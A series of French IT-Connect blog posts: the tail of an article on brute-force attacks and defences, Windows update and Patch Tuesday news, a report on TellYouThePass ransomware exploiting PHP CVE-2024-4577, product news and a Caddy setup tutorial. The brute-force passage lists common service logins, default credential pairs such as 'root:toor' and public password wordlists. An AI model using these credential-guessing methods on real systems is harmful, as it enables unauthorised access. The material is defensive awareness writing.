Bien sûr, d’autres méthodologies plus subtiles existent dans ce contexte des attaques par brute force. Il existe, par exemple, des listes de login “communs” qui sont susceptibles d’être présents sur tous les gros Active Directory d’entreprise. Un ensemble de listes que j’utilise fréquemment et qui donne de bons résultats est situé sur ce dépôt Github :

• Github – InsideTrust/Statistically likely usernames

Si vous avez déjà travaillé sur de gros Active Directory, il y a fort à parier que des comptes avec des logins tels que ceux-ci existent dans votre Active Directory :

• svc-backup
• ldapsvc
• formateur
• accueil
• imprimante
• scan
• etc.

Dès lors, et sans connaissance d’aucun login valide, un attaquant peut utiliser ce genre de dictionnaire pour tenter des attaques en “user as pass”, c’est-à-dire ciblant des comptes qui ont un login “commun” ainsi qu’un mot de passe égal à leur login (exemple “scan:scan”).

Dans ces cas de figure, l’attaquant tente un mot de passe par login également, mais avec un mot de passe “différent” (car dépendant du login utilisé).

Cela peut paraître totalement absurde, mais c’est loin d’être rare et c’est généralement un moyen très rapide et simple d’obtenir un premier accès authentifié à un Active Directory. On peut également retrouver ce type d’opérations dans un contexte web visant des services et applications/frameworks connus. Il existe, par exemple, des listes de couples login/mot de passe connus pour l’accès à un Tomcat Manager qui serait un peu trop exposé, ou d'autres contenant des identifiants fréquemment utilisés pour les services SSH (“root:root”, “root:toor”, etc.)

IV. Où l’attaquant trouve-t-il des mots de passe ?

On peut naturellement se poser la question de la provenance des dictionnaires de mots de passe utilisés par les attaquants lors d’un brute force. Comment l’attaquant choisit les mots de passe qu’il va tenter ?

Nous avons vu qu'une attaque par brute force, l’attaquant se constitue donc une liste de logins à partir de différentes sources, puis il utilisera des dictionnaires de mots de passe déjà constitués. Ces dictionnaires de mots de passe sont la plupart du temps récupérés publiquement. Il existe des dépôts GitHub publics qui référencent de nombreuses wordlist, la plupart étant issues :

• D’un travail de référencement des mots de passe par défaut d’application web, d’équipements en tout genre (switch, routeur) ou de services (mssql, mysql, etc.).
• De fuites de données dont le contenu finit par être publié sur Internet (cas de l’entreprise Rockyou, dont la fuite de données à entrainé la création d'une wordlist contenant 14 344 391 mots de passe).

Voici, en exemple, l’un des dépôt GitHub les plus connus :

• GitHub – danielmiessler/SecLists/Passwords

D'autres sources de liste de mots de passe existent, dont certaines totalement illégales. On peut notamment mentionner les sites qui proposent l'achat du contenu des fuites de données récentes.

Pour des attaques plus précises, l’attaquant peut lui-même construire sa propre wordlist en fonction de son contexte d’attaque. Il utilisera alors une base de mots probables (nom de l’entreprise, nom et numéro de département) ainsi que des outils comme "hashcat" ou "johntheripper", qui permettent de construire des dérivés de mots de passe ("IT-Connect" deviendra "IT-C0nnect", "IT-Connect01!", "ItConnect2024!", etc.) à partir d’une liste initiale. Voici un exemple :

V. Comment se protéger d'une attaque par brute force ?

A. Politique de mot de passe

La première et principale mesure à prendre afin de se protéger des attaques par bruteforce est de renforcer la robustesse de tous les mots de passe. Il convient de mettre en place une politique de mot de passe robuste afin de limiter les chances de succès d’une attaque par brute force basée sur des mots de passe triviaux. Plus les mots de passe sont longs et aléatoires, moins un attaquant aura de chance de les découvrir via ce type d’attaque.

Je vous oriente vers le guide de l’ANSSI sur le sujet pour définir une politique de mot de passe efficace :

• ANSSI - Recommandations relatives à l'authentification multifacteur et aux mots de passe
• Active Directory : comment configurer une stratégie de mots de passe affinée ?
• Utiliser des passphrases à la place des mots de passe

En plus des éléments habituels que sont la longueur, la complexité et le nombre d’alphabets utilisés, la politique doit aussi s’assurer que, dans son mot de passe, l’utilisateur n’utilise pas de mots issus d’informations “publiques” (son nom, nom d’un proche, nom de l’entreprise, d’un projet, région, lieu de vacances de l’année dernière…). Pour cela, différentes techniques et outils existent en fonction des contextes. On peut notamment citer :

• Azure AD Password Protection : IT-Connect - Active Directory : configuration d’Azure AD Password Protection on-premise
• L’outil Specops Password Policy : IT-Connect - Active Directory : améliorez la gestion des mots de passe avec Specops Password Policy
• Il peut aussi être envisagé des contrôles d’entropie, notamment dans le cadre d’application web.

Attention, il ne faut pas oublier que la politique de mot de passe doit être appliquée à la création d’un compte, mais aussi lors des phases de changement de mot de passe.

B. Politique de verrouillage/quota

Nous avons vu que la politique de verrouillage a aussi son importance. Celle-ci permet de définir le seuil de verrouillage d’un compte, mais aussi la durée du verrouillage et la fenêtre de temps observation.

Grâce à ces paramètres, il est possible de grandement ralentir l’opération de l’attaquant, voire de le détecter si un pic de verrouillage de compte est observé. Attention toutefois aux effets de bords (blocage d’un grand nombre de comptes utilisateur). À nouveau, je vous invite à lire notre article sur le sujet :

• IT-Connect - Active Directory et le verrouillage des comptes

Ces politiques de verrouillage de compte peuvent parfois plutôt prendre la forme d’un quota ou d’un bannissement temporaire d’IP. C’est notamment le cas pour les applications web exposées sur Internet. Dans de tels cas, un attaquant pourrait très facilement exploiter la politique de verrouillage des comptes afin de bloquer temporairement ou définitivement (en fonction de sévérité de la politique) les comptes utilisateurs de la plateforme visée.

Il est, en effet, tout à fait envisageable pour un attaquant d’atteindre le seuil de verrouillage pour un compte qu’il sait existant sur l’application web visée afin de rendre indisponible l’application pour le ou les utilisateurs ciblés. Puis, de recommencer son opération de blocage dès que le verrouillage aura expiré, entraînant de fait un déni de service.

Pour empêcher cette exploitation du seuil de verrouillage, il est en général préféré de bannir l’adresse IP de l’attaquant ou de n’autoriser une même adresse IP à faire uniquement quelques requêtes d’authentification par minute.

C. Authentification multifacteurs

La troisième principale méthode pour se protéger des attaques par brute force est de faire en sorte que la connaissance du mot de passe ne suffise pas à se connecter à un compte. On y ajoutera alors un second facteur d’authentification, comme un OTP (One Time Password) envoyé par SMS, e-mail ou via une application spécialisée sur smartphone.

En fonction de la réponse du service visé, l’attaquant pourra certainement savoir si le mot de passe tenté est correct (redirection vers la phase “second facteur”), mais cette information ne sera pas suffisante pour compromettre les comptes ciblés.

Pour aller plus loin, je vous recommande vivement de consulter l’excellent document de l’ANSSI à ce sujet :

• ANSSI - Recommandations relatives à l'authentification multifacteur et aux mots de passe

VI. Conclusion

Dans cet article, nous avons vu ce que sont les attaques par brute force et dans quel but elles sont utilisées lors d’une cyberattaque, que ce soit dans un environnement Active Directory, une application web ou tout autre service réseau dont la sécurité repose sur le couple login/mot de passe.

Nous avons également vu les principaux moyens de protection des comptes utilisateurs contre ces attaques. Pour aller plus loin, il faudrait s’intéresser au moyen de détection d’une telle attaque, mais cela dépend beaucoup de l’environnement ciblé et sera différent, qu’il s’agisse d’un service SSH isolé, d’une application web, ou d’une opération ciblant les comptes d’un Active Directory.

Dans tous les cas, un élément commun sera à utiliser : les journaux d’évènements, leur bonne configuration, leur centralisation et leur surveillance active !

N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord !

The post L’essentiel sur les attaques brute force : principes, types d’attaques et mesures de protection first appeared on IT-Connect.

Mardi 11 juin 2024, Microsoft a mis en ligne la mise à jour KB5039212 pour son système d'exploitation Windows 11 23H2 ! Cette mise à jour corrige des bugs et elle apporte aussi son lot de nouveautés. Faisons le point !

Les nouveautés de juin 2024 pour Windows 11

Cette nouvelle mise à jour pour Windows 11 ajoute un ensemble de nouvelles fonctionnalités, dont voici la liste :

• Fonctionnalité de Partage Windows : cette mise à jour ajoute une fonctionnalité qui vous empêche de fermer accidentellement la fenêtre de partage de Windows. Cliquer en dehors de la fenêtre ne la fermera plus, il sera nécessaire de cliquer sur le bouton "X" en haut à droite de la fenêtre.

• Barre d'adresse de l'Explorateur de fichiers : vous pouvez désormais utiliser votre souris pour faire un glisser-déposer de fichiers entre l'Explorateur et les différents répertoires présents dans le chemin de la barre d'adresse ("fils d'Ariane de la barre d'adresse").

• Gestion du compte Microsoft : cette mise à jour ajoute une nouvelle section appelée "Appareils liés" dans les paramètres de Windows, au sein de la gestion du comte. Sur cette page, vous pouvez gérer vos PC et consoles Xbox. Cette nouveauté ne s'affichera que sur les éditions Famille et Pro de Windows 11, lorsque vous vous connectez au PC à l'aide d'un compte Microsoft (MSA).

• Nouveau gestionnaire de comptes dans le menu Démarrer : lorsque vous utilisez un compte Microsoft pour vous connecter à Windows, vous aurez un aperçu des avantages de votre compte. Cette fonctionnalité facilite également la gestion des paramètres de votre compte.

• Création de QR code : vous pouvez désormais créer des QR codes pour les URL de pages web et les fichiers Cloud à partir de la fenêtre de partage de Windows.

• Sauvegarde Windows : Windows sauvegarde désormais la plupart de vos paramètres sonores / audio, à condition d'activer l'option de sauvegarde des préférences dans les paramètres du système (Paramètres > Comptes > Sauvegarde Windows). Vous pouvez ensuite utiliser l'application "Sauvegarde Windows" pour restaurer ces paramètres sur un nouvel appareil.

• Application Sauvegarde Windows : grâce à cette mise à jour, vous pouvez vous connecter avec votre compte Microsoft dans l'application "Sauvegarde Windows".

• Partage Windows par e-mail : vous pouvez désormais vous effectuer un partage par e-mail à partir de la fenêtre de partage de Windows. Vous recevrez l'e-mail à l'adresse e-mail qui se trouve dans votre compte Microsoft.

• Ajout d'une adresse e-mail de récupération à son compte Microsoft : cette mise à jour lance le déploiement d'un bouton "Ajouter maintenant" dans la section "Paramètres > Compte". Il permet d'ajouter une adresse e-mail de récupération si vous n'en avez pas encore ajouté une à votre compte Microsoft.

L'ensemble de ces nouveautés seront activées progressivement auprès des utilisateurs de Windows 11, après avoir activé la mise à jour.

Quels sont les bugs corrigés par Microsoft ?

Microsoft a corrigé deux bugs associés au processus lsass.exe de Windows, ainsi que d'autres bugs dont ceux-ci mis en avant :

• Résolution d'un problème qui peut empêcher votre système de sortir de la veille prolongée. Ce problème survient après l'activation de BitLocker.

• Résolution d'un problème affectant l'Explorateur de fichiers de Windows, ce dernier ne répond plus lorsque vous effectuez un balayage (swipe) à partir d'un bord de l'écran.

• Résolution d'un problème de déformation de certaines parties de l'écran. Ce problème survient lorsque vous utilisez un navigateur basé sur Chromium pour lire une vidéo (Google Chrome, Microsoft Edge, etc.).

• Résolution d'un problème affectant les casques audio Bluetooth Low Energy (LE). Ils n'affichent pas l'option de connexion ou de déconnexion.

• Résolution d'un dysfonctionnement lié à l'image de profil de votre compte. Lorsque vous essayez de la modifier, vous pouvez obtenir un message d'erreur avec le code "0x80070520".

• Résolution d'un problème qui affecte l'Explorateur de fichiers. Le démarrage peut prendre jusqu'à deux minutes lorsque vous épinglez à l'accès rapide un dossier se trouvant sur un partage réseau. Ce problème spécifique est lié à la mise à niveau de Windows 11 version 21H2 à Windows 11 version 22H2.

Pour en savoir plus sur les autres modifications, consultez cette page du site officiel.

De plus, Microsoft a corrigé des failles de sécurité dans Windows à l'occasion de la sortie de son Patch Tuesday. Pour approfondir le sujet, voici nos articles sur le dernier Patch Tuesday ainsi que sur la mise à jour Windows 10 :

• Microsoft Patch Tuesday de juin 2024
• Mise à jour Windows 10 de juin 2024 (KB5039211)

Windows 11 : les KB de juin 2024

Voici la liste des mises à jour Windows 11 publiées par Microsoft :

• Windows 11 23H2, Windows 11 22H2 : KB5039212
• Windows 11 21H2 : KB5039213

Sur Windows 11 23H2, suite à l'installation de cette mise à jour, le numéro de version du système passera sur "22631.3737".

Les mises à jour mentionnées ci-dessus sont disponibles via plusieurs canaux : Windows Update, WSUS, etc. À partir d'une machine locale, une recherche à partir de Windows Update permettra de récupérer la nouvelle mise à jour.

The post KB5039212 : le point sur la mise à jour Windows 11 de juin 2024 first appeared on IT-Connect.

Mardi 11 juin 2024, Microsoft a publié la mise à jour KB5039211 pour les ordinateurs sous Windows 10 22H2 et Windows 10 21H2 ! C'est l'occasion de faire le point sur les changements apportés par cette mise à jour !

Cette nouvelle mise à jour cumulative obligatoire publiée par Microsoft inclut 12 changements. Elle corrige différents bugs et ajoute une fonctionnalité.

Nouvelle fonctionnalité pour l'Outil capture d'écran (Snipping Tool)

Une nouveauté attend les utilisateurs de l'Outil capture d'écran de Windows 10. Désormais, une nouvelle fonctionnalité permet de modifier des images prises sur votre appareil Android directement dans Windows.

Pour profiter de cette nouveauté, vous devez bien entendu lier votre smartphone à votre PC avec la fonction "Mobile connecté" de Windows. "Votre PC recevra une mise à jour Cross Device Experience Host dans le Microsoft Store. Cette mise à jour est nécessaire pour que la fonctionnalité fonctionne.", précise Microsoft sur cette page. De plus, cette fonctionnalité est déployée progressivement auprès des utilisateurs.

Les changements principaux opérés par Microsoft

Voici les quelques changements mis en avant par Microsoft sur son site, pour cette nouvelle mise à jour :

• Cette mise à jour résout un problème d'affichage avec les fenêtres cachées. Sa barre de titre n'a pas de contenu. Ce problème survient lorsque vous partagez votre écran à l'aide de certaines applications.
• Cette mise à jour corrige un problème affectant le bouton "Partager" sur les contrôleurs USB. Il se peut qu'il ne fonctionne pas avec la Game Bar de Windows.
• Cette mise à jour corrige un problème affectant lsass.exe, où le processus ne répond plus. Cela se produit après l'installation des mises à jour de sécurité d'avril 2024 sur les serveurs Windows.
• Cette mise à jour corrige un problème affectant lsass.exe, qui donne lieu à une fuite de mémoire. Cela se produit lors d'un appel LSARPC (Local Security Authority (Domain Policy) Remote Protocol).

Par ailleurs, la correction de ce bug pourrait intéresser certains utilisateurs :

• Cette mise à jour résout un problème qui affecte les comptes Microsoft Entra ID. Les appareils Windows ne peuvent pas en authentifier un second. Ce problème survient après l'installation de la mise à jour de Windows, datée du 13 novembre 2023.

Pour en savoir plus sur les dernières failles de sécurité corrigées et la mise à jour pour Windows 11, vous pouvez lire ces articles :

• Microsoft Patch Tuesday de juin 2024
• Mise à jour Windows 11 de juin 2024 (KB5039212)

Suivi : fin du support de Windows 10

Depuis le mardi 11 juin 2024, plusieurs versions de Windows 10 21H2 ne sont plus prises en charge par Microsoft et viennent de recevoir leur dernière mise à jour. Enterprise, Enterprise multi-session et Education.

• Fin du support de Windows 10 21H2 Enterprise

Windows 10 : les KB de mai 2024

Voici la liste des mises à jour publiées par Microsoft :

• Windows 10 21H2 et 22H2 : KB5039211
• Windows 10 version 21H1 : Fin du support
• Windows 10 version 20H2 : Fin du support
• Windows 10 version 2004 : Fin du support
• Windows 10 version 1909 : Fin du support
• Windows 10 version 1903 : Fin du support
• Windows 10 version 1809 : KB5039217
• Windows 10 version 1803 : Fin du support
• Windows 10 version 1709 : Fin du support
• Windows 10 version 1703 : Fin du support
• Windows 10 version 1607 : KB5039214
• Windows 10 version 1507 : KB5039225

Les mises à jour mentionnées ci-dessus sont disponibles via plusieurs canaux : Windows Update, WSUS, etc. À partir d'une machine locale, une recherche à partir de Windows Update permettra de récupérer la nouvelle mise à jour.

The post Windows 10 KB5039211, que contient la mise à jour de juin 2024 ? first appeared on IT-Connect.

Le Patch Tuesday de Juin 2024 a été publié par Microsoft ! Il inclut des correctifs de sécurité pour 51 vulnérabilités ainsi qu'une faille de sécurité zero-day déjà connue avant la publication de ce patch. Faisons le point.

Ce mardi 11 juin 2024, Microsoft a publié un Patch Tuesday relativement léger en comparaison des mois précédents. L'entreprise américaine a corrigé des failles de sécurité dans plusieurs services Azure (Monitor, File Sync, etc.), mais aussi dans la suite Office (Outlook, Word, notamment), dans Visual Studio, le rôle Serveur DHCP, dans la fonction DFS, ainsi que dans différents composants de Windows y compris le noyau du système d'exploitation.

Pour en savoir plus sur les mises à jour pour Windows 10 et Windows 11 :

• Mise à jour Windows 10 de juin 2024 (KB5039211)
• Mise à jour Windows 11 de juin 2024 (KB5039212)

Une seule faille de sécurité critique : CVE-2024-30080

Ce Patch Tuesday corrige une seule faille de sécurité critique, associée à la référence CVE-2024-30080, présente dans Microsoft Message Queuing (MSMQ).

Elle permet une exécution de code à distance, comme l'explique Microsoft : "Pour exploiter cette vulnérabilité, un attaquant doit envoyer un paquet MSMQ malveillant spécialement conçu à un serveur MSMQ. Cela pourrait entraîner l'exécution de code à distance du côté du serveur." - Le service de Message Queuing écoute sur le port 1801/TCP lorsqu'il est actif sur une machine.

Elle affecte Windows 10, Windows 11 ainsi que toutes les versions de Windows Server à partir de Windows Server 2008.

CVE-2023-50868 - DNSSEC : déni de service sur les serveurs DNS

Déjà connue publiquement, la faille de sécurité CVE-2023-50868 n'est pas exploitée dans le cadre de cyberattaques (à ce jour). Il s'agit d'une vulnérabilité présente dans DNSSEC et plus précisément dans le mécanisme NSEC3 (utilisé pour les preuves de non-existence d'un enregistrement DNS). En exploitant cette faiblesse, un attaquant peut causer un déni de service grâce à l'augmentation de la charge CPU sur la machine ciblée, en l'occurrence un résolveur DNS.

Cette vulnérabilité affecte Windows Server 2012 et les versions supérieures, y compris les installations en mode "Core", où le rôle de serveur DNS est installé. En fait, cette faille de sécurité n'est pas liée à Windows Server mais à DNSSEC, donc les autres implémentations de serveurs DNS, y compris sur Linux, sont affectées. Pour en savoir plus, vous pouvez consulter cette page.

Source

The post Patch Tuesday – Juin 2024 : 51 failles de sécurité et 1 zero-day corrigées par Microsoft ! first appeared on IT-Connect.

Le gang de ransomware TellYouThePass exploite activement la faille de sécurité critique découverte dans PHP ! Grâce à cette vulnérabilité, ils peuvent déployer un webshell et l'utiliser pour exécuter un payload pour chiffrer les données du système compromis ! Faisons le point sur cette menace.

Depuis quelques jours, une faille de sécurité critique présente dans PHP et associée à la référence CVE-2024-4577 a été divulguée et corrigée par les mainteneurs du projet PHP. Présente dans toutes les versions de PHP à partir de la version 5.X, et jusqu'aux branches les plus récentes, cette vulnérabilité permet une exécution de code à distance lorsque PHP est utilisé sur Windows. Si vous souhaitez en savoir plus, retrouvez notre article à ce sujet : PHP - CVE-2024-4577.

Le 6 juin 2024, de nouvelles versions de PHP ont été publiées pour corriger cette vulnérabilité. Moins de 48 heures plus tard, le gang de ransomware TellYouThePass a commencé à lancer ses premières attaques ! D'ailleurs, ce n'est pas la première fois que ce gang de ransomware se montre très réactif pour tenter d'exploiter les vulnérabilités présentes sur les services Web. C'était déjà le cas avec une précédente vulnérabilité dans Apache ActiveMQ ainsi que la fameuse faille de sécurité dans Log4j.

Les chercheurs en sécurité d'Imperva ont mis en ligne un nouveau rapport pour évoquer cette campagne de cyberattaques menée par TellYouThePass. "Les attaquants ont utilisé l'exploit connu pour la CVE-2024-3577 afin d'exécuter un code PHP arbitraire sur le système cible, en s'appuyant sur le code pour utiliser la fonction "system" afin d'exécuter un fichier d'application HTML hébergé sur un serveur web contrôlé par l'attaquant via le binaire mshta.exe.", peut-on lire.

Une fois que la souche malveillante est en place, elle envoie une requête HTTP au serveur C2 des cybercriminels pour notifier l'infection. Afin d'échapper aux systèmes de détection, cette requête se fait passer pour une demande de récupération de ressources CSS. Au passage, l'adresse IP du serveur C2 semble codée en dur dans l'échantillon analysé par les chercheurs en sécurité : 88[.]218.76.13.

L'étape finale : l'exécution du ransomware TellYouThePass

La dernière étape consiste à exécuter le ransomware TellYouThePass sur la machine compromise. Autrement dit, sur le serveur Web Windows compromis par l'intermédiaire de PHP.

Le logiciel malveillant commence par énumérer les répertoires avant de tuer différents processus et de générer les clés de chiffrement afin de commencer à chiffrer les données de la machine. Ceci inclut notamment les données de l'application Web.

Pour finir, une note de rançon représentée par le fichier "READ_ME10.html" est déposée sur la machine, à la racine du répertoire web.

Protégez-vous de cette vulnérabilité dès que possible. D'après un rapport de Censys, en date du 9 juin 2024, il y avait 458 800 serveurs exposés sur Internet et potentiellement vulnérables à cette faille de sécurité.

Source

The post Le ransomware TellYouThePass exploite la faille critique dans PHP pour pirater les serveurs Web ! first appeared on IT-Connect.

Toujours à l'occasion de son 21ème anniversaire, Geekom propose une réduction de 180 euros sur le mini PC Geekom XT12 Pro ! Un modèle très bien équipé ! Voici ce qu'il faut savoir sur ce bon plan.

La série de mini PC "XT" de chez Geekom vise l'excellence avec un design très soigné et une fiche technique très solide basée sur une architecture Intel. Ces modèles sont équipés d'un processeur puissant, d'une quantité importante de mémoire vive ainsi que d'une connectique très riche.

Découvrez aussi cette offre sur le modèle Geekom Air 12 :

• Bon plan - Geekom Air 12 (Juin 2024)

180 euros de remise sur le Geekom XT12 Pro

Avec le code "itc180xt12" à utiliser sur la boutique officielle de Geekom, obtenez 180 euros de réduction immédiate sur le mini PC Geekom XT12 Pro ! Résultat, grâce à cette offre, son prix passe de 779,00 euros à 599,00 euros ! De plus, vous avez le droit à une garantie de 3 ans du constructeur !

Le colis sera expédié directement depuis l'Europe (Allemagne), ce qui vous assure une livraison en quelques jours seulement. Pour bénéficier de cette offre, vous pouvez utiliser notre lien d'affilié Geekom : cliquez ici pour en savoir plus et accéder à l'offre.

Les caractéristiques du modèle Geekom XT12 Pro

Le Geekom XT12 Pro a fait l'objet d'un test complet sur IT-Connect, ce qui vous donnera l'occasion d'en savoir plus sur son design, ses performances, et ses caractéristiques :

• Test Geekom XT12 Pro

Sachez qu'il est équipé d'un processeur Intel Core i9-12900H(14 Cœurs, 20 Threads, 24 Mo de cache, jusqu'à 5,00 GHz), de 32 Go de RAM (DDR4) et 1 To de SSD NVMe (Gen4). La RAM peut être augmentée jusqu'à 64 Go, et il y a un emplacement disponible pour ajouter un second SSD (SATA).

Il bénéficie d'une connectique très complète avec un total de 6 ports USB dont 2 ports USB4 (norme la plus récente à ce jour !), ainsi qu'une interface réseau 2.5 GbE, 2 ports HDMI 2.0, et même un lecteur de carte SD ! Il prend en charge jusqu'à 4 écrans simultanément grâce à sa connectique complète.

Le Geekom XT12 Pro est livré avec le système d'exploitation Windows 11 Pro, que vous pouvez remplacer bien entendu. Vous pouvez installer un hyperviseur, par exemple, si vous souhaitez transformer ce mini PC en serveur pour la maison.

The post Bon plan – 180 euros de remise sur l’excellent mini PC Geekom XT12 Pro first appeared on IT-Connect.

À l'occasion de son événement WWDC24, Apple a dévoilé un gestionnaire de mots de passe disponible pour les OS Apple et même Windows ! Faisons le point sur cette annonce !

Depuis plusieurs heures, Apple fait la une de l'actualité suite à l'annonce de sa fonction d'IA baptisée "Apple Intelligence" permettant d'accéder à ChatGPT depuis un iPhone, un iPad ou un Mac. Mais, ce n'est pas la seule nouveauté dévoilée par Apple à l'occasion de la keynote WWDC24.

Lors de la présentation de macOS 15 Sequoia, Apple a dévoilé une nouvelle application tout simplement baptisée "Mots de passe". Comme son nom le laisse penser, il s'agit d'un gestionnaire de mots de passe. Les utilisateurs d'Apple auront le droit à un gestionnaire de mots de passe développé par la firme de Cupertino en elle-même, ce qui pourrait leur permettre de ne plus utiliser LastPass, Bitwarden, 1Password, etc...

Même s'il reste beaucoup à découvrir au sujet du gestionnaire de mots de passe d'Apple, ce dernier semble prometteur. Lors de cette conférence, Apple a présenté son application à partir d'une capture d'écran qui montre qu'il sera capable de gérer les passkeys (ou clés d'accès), les codes de vérification et les informations de connexion aux réseaux Wi-Fi. Bien entendu, il permettra de stocker aussi des identifiants (nom d'utilisateur + mot de passe).

Il y aura aussi une fonction de création de groupe pour faciliter le partage de certains mots de passe ou secrets enregistrés dans votre coffre-fort de mots de passe. De plus, l'application d'Apple pourra vous alerter si vous utilisez un mot de passe trop faible ou déjà compromis.

Un gestionnaire de mots de passe Apple multiplateforme

Le gestionnaire de mots de passe d'Apple sera disponible sur Mac, iPhone, iPad et aussi avec le casque Vision Pro. En effet, il sera compatible avec macOS 15, iOS 18, iPadOS 18 et le système visionOS. Cela ne s'arrête pas là puisqu'il sera disponible sur Windows via l'application iCloud.

Cette application devrait être gratuite, bien que cela reste à confirmer. Il est certain qu'elle devrait faire de l'ombre aux gestionnaires de mots de passe actuels, et elle devrait avoir du succès auprès des utilisateurs de produits Apple.

Qu'en pensez-vous ?

Source

The post Apple dévoile un gestionnaire de mots de passe pour macOS, iOS et… Windows ! first appeared on IT-Connect.

I. Présentation

Comment déployer le serveur web Caddy sur une machine Linux ? Ce tutoriel répond à cette question, car nous allons installer et configurer Caddy sur Debian 12 ! Nous verrons quelques options de configuration, ainsi que l'ajout de PHP-FPM, pour vous permettre de faire vos premiers pas avec Caddy.

Qu'est-ce que Caddy Web Server ?

Écrit en Go, Caddy est un serveur web open source créé par ZeroSSL. Il représente une alternative aux autres serveurs Web, notamment Apache2 et Nginx que vous connaissez probablement. Vous pouvez utiliser ce lien pour accéder au site officiel.

Voici quelques caractéristiques clés pour décrire Caddy :

• Caddy prend en charge le HTTPS automatique, c'est-à-dire qu'il va obtenir un certificat TLS automatiquement pour votre site Web. Ce certificat TLS valide est obtenu auprès de Let's Encrypt et sera renouvelé automatiquement. Possibilité d'avoir du HTTPS sur localhost également, grâce à une autorité de certification locale. C'est un gros point positif pour ce serveur Web.
• Son fichier de configuration Caddyfile peut-être rédigé en mode déclaratif ou au format JSON. ll y a ce que Caddy appelle des "Config Adapter" permettant la prise en charge de différents formats : une configuration rédigée au format Nginx sera interprétée par Caddy.
• Son API native sert à gérer la configuration du serveur web.
• Caddy est rapide à installer et à configurer pour publier un simple site web.
• Caddy peut gérer plusieurs sites web, avec un système de "virtual hosts" par nom de domaine et port.
• Caddy peut jouer le rôle de reverse proxy.

Si vous souhaitez également vous intéresser à d'autres serveurs, voici nos tutoriels :

• Installer un serveur Web Apache2 sur Linux
• Installer un serveur Web Nginx sur Linux
• Installer un serveur Web IIS sur Windows Server

II. Installer Caddy sur Debian

Nous allons commencer par installer Caddy sur notre machine Debian. La configuration réseau de celle-ci a été préparée en amont.

Commençons par installer des paquets nécessaires à la suite des opérations, notamment pour ajouter le dépôt sur lequel se situe le paquet d'installation de Caddy.

sudo apt update
sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl

Puis, ajoutons le dépôt en question après avoir récupéré sa clé GPG :

curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg
curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list

Nous n'avons plus qu'à mettre à jour le cache des paquets et à installer le paquet "caddy" en lui-même.

sudo apt update
sudo apt install caddy

Ces étapes sont celles présentées dans la documentation officielle. Vous pouvez vous référer à cette page pour obtenir les instructions pour d'autres distributions.

• Documentation - Caddy - Installation

Systemctl peut gérer le service Caddy et nous allons pouvoir activer son démarrage automatique.

sudo systemctl enable caddy
sudo systemctl start caddy

Dès à présent, nous devons pouvoir accéder à la page par défaut de Caddy. Suite à l'installation, il est actif sur le port 80 en HTTP.

http://<adresse IP du serveur>
http://<Nom de domaine>

Voici la page obtenue :

Pour connaître la version de Caddy, voici la commande à exécuter :

caddy version
v2.7.6 h1:w0NymbG2m9PcvKWsrXO6EEkY9Ru4FJK8uQbYcev1p3A=

Remarque : il y a un jeu de commandes complet associé à la commande "caddy" en elle-même.

L'installation étant terminée, nous allons aborder la configuration de Caddy dans la suite de l'article.

III. Créer sa première configuration Caddy

Comment configurer un premier site web sur Caddy ? Bonne question. Ici, notre objectif sera de configurer le serveur web pour héberger le site "webcad.it-connect.tech" : un enregistrement DNS public a été créé au préalable, ce qui va permettre à Caddy d'obtenir un certificat TLS pour ce site.

A. Configurer le Caddyfile

En mode texte, la configuration de Caddy passe par l'édition du fichier "/etc/caddy/Caddyfile". Dans ce fichier, un ou plusieurs sites web peuvent être déclarés et configurés.

sudo nano /etc/caddy/Caddyfile

Voici le contenu par défaut de ce fichier. Nous retrouvons bien l'instruction ":80" indiquant que Caddy écoute sur le port 80 par défaut, sur son adresse IP et pour tous les noms de domaine éventuel.

Avant de vous présenter la configuration à définir, quelques explications s'imposent :

• La directive "root" sert à indiquer la racine du site web, c'est-à-dire le chemin vers le répertoire qui contient les fichiers du site web.
• La directive "file_server" sert à activer la distribution des fichiers statiques (fichiers HTML, par exemple) pour ce site web.
• La directive "encode" sert à activer la compression pour délivrer les fichiers statiques, en activant Zstandard et Gzip (l'ordre est important pour prioriser un algorithme de compression).

Ce qui donne :

webcad.it-connect.tech {
        # Racine du site web
        root * /var/www/webcad

        # Activer la compression Zstandard et Gzip
        encode zstd gzip

        # Activer la distribution de fichiers statiques
        file_server
}

Enregistrez le fichier.

Avant de redémarrer Caddy, créez le dossier du site web et attribuez l'utilisateur "caddy" comme propriétaire :

mkdir -p /var/www/webcad
chown caddy:caddy /var/www/webcad

Puis, créez une page web à la racine du site. Pour ma part, j'ai créé le fichier "/var/www/webcad/index.html" avec le contenu suivant :

<html>
<head>
</head>
<body>
<h1>Caddy - IT-Connect</h1>
</body>
</html>

Redémarrez Caddy :

sudo systemctl restart caddy

Sachez que nous pouvons demander à Caddy de vérifier le fichier de configuration avant de redémarrer le service. Ici, comme nous utilisons le fichier "Caddyfile", nous allons utiliser l'Adapter du même. Ce qui donne la commande suivante :

caddy validate --adapter caddyfile --config /etc/caddy/Caddyfile

Désormais, testons ! Le site Web est accessible en HTTPS ! Le certificat TLS est valide, et pourtant, je n'ai pas fait la moindre manipulation ! Caddy a géré seul la partie certificat et il prend en charge aussi la redirection HTTP vers HTTPS.

Dans la suite de cet article, nous allons découvrir des directives supplémentaires et peauffiner notre configuration. En complément, voici le lien vers la documentation officielle :

• Documentation - Caddy - Directives

B. Configurer le logs de Caddy

Comme pour tout système, la journalisation des accès et des erreurs est importante. C'est pourquoi nous allons configurer notre serveur Caddy pour qu'il journalise les actions associées au site "webcad.it-connect.tech". Ceci passe par l'utilisation de la directive "log" qui elle-même accepte différentes options.

Voici le code à ajouter (sous la partie "# Logging") :

webcad.it-connect.tech {
        # Racine du site web
        root * /var/www/webcad

        # Activer la distribution de fichiers statiques
        file_server

        # Activer la compression Zstandard et Gzip
        encode zstd gzip

        # Logging
        log {
                output file /var/log/caddy/access.log {
                        roll_size 1gb
                        roll_keep 5
                        roll_keep_for 720h
                }
        }

}

Pour que vous puissiez mieux comprendre ces lignes, voici quelques explications :

• Le fichier de log utilisé par Caddy sera "/var/log/caddy/access.log". Caddy gère un seul fichier de log pour les accès et les erreurs, contrairement à Apache2 où nous avons l'habitude d'avoir "access.log" et "error.log".
• roll_size : taille d'un fichier de log avant de créer un nouveau fichier (sans supprimer l'ancien le plus récent - dépend de la suite de la configuration).
